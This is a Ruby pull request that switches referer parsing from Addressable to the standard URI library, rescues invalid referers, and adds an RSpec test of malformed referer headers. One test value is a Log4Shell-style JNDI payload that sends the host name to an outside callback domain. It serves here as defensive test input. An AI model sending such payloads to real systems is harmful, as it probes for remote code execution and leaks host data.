### PR TITLE
CDAW-5580 | CHORE | Fix Addressable::URI::InvalidURIError

### DIFF
--- a/land.gemspec
+++ b/land.gemspec
@@ -41,7 +41,6 @@ Gem::Specification.new do |gem|
   gem.executables   = gem.files.grep(%r{^exe/}) { |f| File.basename(f) }
   gem.require_paths = ["lib"]
 
-  gem.add_dependency "addressable"
   gem.add_dependency "activerecord", " > 4.0.0"
   gem.add_dependency "lookup_by",    "~> 0.12.0"
 

--- a/lib/land/tracker.rb
+++ b/lib/land/tracker.rb
@@ -2,7 +2,6 @@
 
 require "digest/sha2"
 require "uri"
-require "addressable/uri"
 
 module Land
   class Tracker
@@ -192,7 +191,9 @@ module Land
     end
 
     def referer_uri
-      @referer_uri ||= Addressable::URI.parse(request.referer.sub(/\Awww\./i, '//\0')) if request.referer.present?
+      @referer_uri ||= URI.parse(request.referer.sub(/\Awww\./i, '//\0')) if request.referer.present?
+    rescue URI::InvalidURIError => _e
+      @referer_uri = URI.parse("/invalid-referer-uri?referer=#{CGI.escape(request.referer)}")
     end
 
     def attribution

--- a/spec/land/trackers/user_tracker_spec.rb
+++ b/spec/land/trackers/user_tracker_spec.rb
@@ -1,0 +1,62 @@
+# frozen_string_literal: true
+
+require 'rails_helper'
+
+module Land
+  module Trackers
+    describe UserTracker do
+      let(:request) { ActionDispatch::TestRequest.create }
+      let(:response) { ActionDispatch::Response.create }
+      let(:controller) { double('controller', request: request, response: response, session: {}) }
+
+      subject(:user_tracker) { described_class.new(controller) }
+
+      describe '#track' do
+        context 'when referer header is passed in' do
+          {
+            'http://m.facebook.com' => {
+              domain: 'm.facebook.com',
+              path: '/',
+              query_string: ''
+            },
+            '172.64.147.80:443/module/login/login.html' => {
+              domain: '',
+              path: '/invalid-referer-uri',
+              query_string: 'referer=172.64.147.80%3A443%2Fmodule%2Flogin%2Flogin.html'
+            },
+            '${jndi:ldap://127.0.0.1#.${hostName}.referer.co6ie8vkjvuu6bgp6c5gmkjktaa6yu8jy.it.h4.vc}' => {
+              domain: '',
+              path: '/invalid-referer-uri',
+              query_string: 'referer=%24%7Bjndi%3Aldap%3A%2F%2F127.0.0.1%23.%24%7BhostName%7D.referer.co6ie8vkjvuu6bgp6c5gmkjktaa6yu8jy.it.h4.vc%7D'
+            },
+            'www.example.com/@F#$#D!^&*~^%DS%F&DF^&*D*F&^D' => {
+              domain: '',
+              path: '/invalid-referer-uri',
+              query_string: 'referer=www.example.com%2F%40F%23%24%23D%21%5E%26%2A~%5E%25DS%25F%26DF%5E%26%2AD%2AF%26%5ED'
+            }
+          }.each do |referer, result|
+            it "saves referer (#{referer})" do
+              request.headers['referer'] = referer
+              user_tracker.track
+
+              expect(user_tracker.visit.referer).to have_attributes(result)
+            end
+          end
+        end
+
+        it "referer is nil when no referer header" do
+          user_tracker.track
+
+          expect(user_tracker.visit.referer).to be_nil
+        end
+
+        it "referer is nil when referer header is empty string" do
+          request.headers['referer'] = ''
+          user_tracker.track
+
+          expect(user_tracker.visit.referer).to be_nil
+        end
+      end
+    end
+  end
+end


### PR DESCRIPTION
When referer header contains invalid uri  it'll result in error `InvalidURIError` which prevents Visit record from being created.  This will further create more noises due to Visit being nil.  These errors aren't causing user impact, but it does cause noise in BF/Auth/ADR.